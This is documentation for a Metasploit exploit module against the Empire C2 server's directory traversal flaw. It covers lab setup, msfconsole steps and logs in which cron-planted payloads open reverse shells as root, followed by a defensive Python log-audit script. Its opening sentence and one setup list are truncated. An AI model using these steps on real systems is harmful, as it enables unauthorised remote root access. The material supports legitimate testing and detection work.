## Vulnerable Application

This module exploits a directory traversal vulnerability in both BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (

#### BC-SECURITY/Empire C2 Framework

```bash
apt update
apt install cron
cron
```

(Payload will be loaded in container but you have to manually set up cron on container.)

6. Run the client. `docker run -it --net="host" bcsecurity/empire:v5.9.2 client`
7. Execute Empire listener on client.

    ```bash
    uselistener http
    set Host
    set Port
    execute
    ```

#### ProjectEmpire/Empire

1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or another Linux distro) in your virtualization engine.
3. Clone Empire. `git clone https://github.com/EmpireProject/Empire.git`
4. `cd Empire`
5. `git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110`
6. `docker pull empireproject/empire`
7. `docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash` (Payload will be loaded in host, not in container.) or

    ```bash
    docker run -it --net="host" empireproject/empire /bin/bash
    cron
    ```

    (Payload will be loaded in container but you have to manually set up cron on container.)
8. `cd setup`
9. `./reset.sh` (Empire start)
10. Execute listener.

    ```bash
    listeners
    set Host
    set Port
    run
    ```

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/empire_skywalker`
4. Do: `set rhost `
5. Do: `set rport `
6. Do: `set lhost `
7. Optional: `set CVE `
8. Do: `run`
9. Have the generated request processed by a vulnerable version of Empire
10. You should get a shell or meterpreter

## Options

### TARGETURI (optional)

This is the base URI path. This is used when CVE is set to `Original`. Default is `/`.

### STAGE0_URI (required)

This is the URI path requested by the initial launcher. This is used when CVE is set to `Original`. Default is `index.asp`.

### STAGE1_URI (required)

This is the URI path used by the RSA key post. This is used when CVE is set to `Original`. Default is `index.jsp`.

### PROFILE (optional)

This is the Empire agent traffic profile URI. This is used when CVE is set to `Original`.

### CVE (required)

This is the vulnerability to use. Default is `CVE-2024-6127`, but `Original` can also be chosen.

### STAGE_PATH (required)

This is Empire's default staging path. This is used when CVE is set to `CVE-2024-6127`. Default is `login/process.php`. ([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))

### PROFILE (required)

This is the User-Agent of Empire's default agent communication profile. This is used when CVE is set to `CVE-2024-6127`. Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`. ([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))

## Scenarios

### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)

```
msf > use exploit/linux/http/empire_skywalker
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
rhost => 192.168.56.7
msf exploit(linux/http/empire_skywalker) > set rport 80
rport => 80
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.7:80 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/NYLkIKRK
[*] Writing cron job to /etc/cron.d/AeVTTPiZ
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.7
[+] Deleted /etc/cron.d/AeVTTPiZ
[+] Deleted /tmp/NYLkIKRK
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
meterpreter > sysinfo
Computer        : kali
OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
```

### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)

```
msf > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/jJzYkeKV
[*] Writing cron job to /etc/cron.d/nFnFIbim
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/nFnFIbim
[+] Deleted /tmp/jJzYkeKV
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900

whoami
root
```

### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)

```
msf > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/qxlOSIYF
[*] Writing cron job to /etc/cron.d/ugrYIJzf
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/ugrYIJzf
[+] Deleted /tmp/qxlOSIYF
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900

whoami
root
```

### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)

```
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/PSDaqPOJ
[*] Writing cron job to /etc/cron.d/KQlwBZQk
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/KQlwBZQk
[+] Deleted /tmp/PSDaqPOJ
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
[!] This exploit may require manual cleanup of '/agent.log' on the target
meterpreter > sysinfo
Computer        : kali
OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```

### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)

```
msf > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/VzTAquhE
[*] Writing cron job to /etc/cron.d/LjvThMOu
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/LjvThMOu
[+] Deleted /tmp/VzTAquhE
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900

whoami
root
```

### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)

```
msf > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set cve Original
cve => Original
msf exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/uuTqlfDp
[*] Writing cron job to /etc/cron.d/frDtYnmD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/frDtYnmD
[+] Deleted /tmp/uuTqlfDp
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900

whoami
root
```
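The Options section above documents the two values the module relies on for `CVE-2024-6127`: Empire's default staging path (`login/process.php`) and the User-Agent of its default communication profile, and the description gives `5.9.3` as the first unaffected BC-SECURITY/Empire release. For an operator running an Empire listener, the scenarios show what an attack looks like from the server's side: a host that was never issued an agent completes the staging handshake. The following added example (not code from the Metasploit module or from Empire) turns those documented defaults into a small audit: it checks a version string against the `<5.9.3` threshold and scans listener access logs for staging requests from hosts outside a known-agent allowlist. It assumes the requests are logged in Apache/nginx combined format (for instance by a reverse proxy placed in front of the listener); the log lines and the allowlist are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Defaults as documented in the module's Options section (Empire's agents.py).
DEFAULT_STAGE_PATH = "login/process.php"
DEFAULT_PROFILE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

# First BC-SECURITY/Empire release the module description lists as not affected.
FIRST_FIXED_VERSION = (5, 9, 3)

# Apache/nginx "combined" access-log format: an assumption for this example,
# e.g. a reverse proxy logging in front of the Empire HTTP listener.
COMBINED_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn a tag such as 'v5.9.2' into a comparable tuple (5, 9, 2)."""
    return tuple(int(part) for part in version.lstrip("vV").split("."))


def is_affected_bc_security(version: str) -> bool:
    """True when a BC-SECURITY/Empire version is below the 5.9.3 fix threshold."""
    return parse_version(version) < FIRST_FIXED_VERSION


@dataclass(frozen=True)
class StagingRequest:
    src: str
    timestamp: str
    method: str
    path: str
    status: str


def find_staging_requests(
    log_lines: Iterable[str],
    stage_path: str = DEFAULT_STAGE_PATH,
    profile_ua: str = DEFAULT_PROFILE_UA,
) -> List[StagingRequest]:
    """Return every request to the staging path that carries the profile's User-Agent.

    Lines that are not in combined format are skipped rather than guessed at.
    """
    hits: List[StagingRequest] = []
    for line in log_lines:
        m = COMBINED_LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        if m["path"].lstrip("/") != stage_path or m["ua"] != profile_ua:
            continue
        hits.append(StagingRequest(m["src"], m["ts"], m["method"], m["path"], m["status"]))
    return hits


def unexpected_staging(hits: Iterable[StagingRequest], known_agents: Iterable[str]) -> List[StagingRequest]:
    """Keep only staging requests from source hosts that are not known agents."""
    known = set(known_agents)
    return [h for h in hits if h.src not in known]


# Constructed sample log for this example; no real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jul/2024:11:31:02 +0900] "GET / HTTP/1.1" 200 612 "-" "curl/8.5.0"',
    '10.0.0.21 - - [20/Jul/2024:11:31:40 +0900] "POST /login/process.php HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '192.168.56.1 - - [20/Jul/2024:11:32:01 +0900] "POST /login/process.php HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '192.168.56.1 - - [20/Jul/2024:11:32:02 +0900] "GET /login/process.php HTTP/1.1" 200 320 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    "garbage line that does not parse",
]
# Constructed allowlist: the one lab host an agent was deliberately deployed to.
KNOWN_AGENTS = ["10.0.0.21"]


if __name__ == "__main__":
    print("v5.9.2 affected:", is_affected_bc_security("v5.9.2"))
    for h in unexpected_staging(find_staging_requests(SAMPLE_LOG), KNOWN_AGENTS):
        print(f"unexpected staging from {h.src} at {h.timestamp}: {h.method} {h.path} -> {h.status}")
```

Running it flags the two requests from `192.168.56.1`, the host that plays the attacker in the scenarios above, and leaves the allowlisted agent alone. If the listener was started with a non-default profile or staging path, pass those values to `find_staging_requests` instead of relying on the defaults.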